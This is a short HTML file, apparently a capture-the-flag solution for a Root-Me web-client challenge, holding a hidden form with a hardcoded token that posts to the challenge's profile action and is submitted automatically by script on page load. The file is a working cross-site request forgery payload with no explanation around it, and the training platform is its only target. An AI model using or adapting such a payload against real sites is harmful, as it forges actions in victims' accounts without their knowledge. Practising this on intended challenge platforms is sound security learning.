You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
 
 
 

10 lines
363 B

<form id="pl" method="POST" action="http://challenge01.root-me.org/web-client/ch23/?action=profile">
<input type="text" name="username" value="a">
<input type="checkbox" name="status" checked>
<input type="text" name="token" value="769c1cabcf028393e63536a45f96c19e">
</form>
<script>
pl = document.getElementById("pl");
pl.submit();
</script>